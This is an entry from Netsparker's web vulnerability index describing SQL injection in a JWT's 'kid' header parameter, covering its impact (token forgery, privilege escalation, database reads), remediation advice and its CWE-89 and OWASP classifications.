Summary #

Netsparker detected an SQL injection in a JSON Web Token's kid header parameter. This allows for the forgery of valid JSON Web Tokens with arbitrary payloads.

Impact #

Attackers might be able to tamper with the values inside the JWT token payload and escalate privileges, impersonate users or trigger unintended application states that were meant to be prevented by the use of a tamper-proof token solution. Additionally, they might be able to read data from the underlying SQL database.

Remediation #

In order to fix this vulnerability, the underlying SQL Injection vulnerability has to be fixed first. It is important that the kid parameter is free from any injection vulnerabilities and has a proper fallback on error conditions, such as invalid data which is returned from the respective storage solution of the secret key.

Classifications #
CWE-89; OWASP 2017-A1
Vulnerability Index

Vulnerability Index

You can search and find all vulnerabilities

OR

Search Vulnerability

Netsparker

Dead accurate, fast & easy-to-use Web Application Security Scanner

Get a demo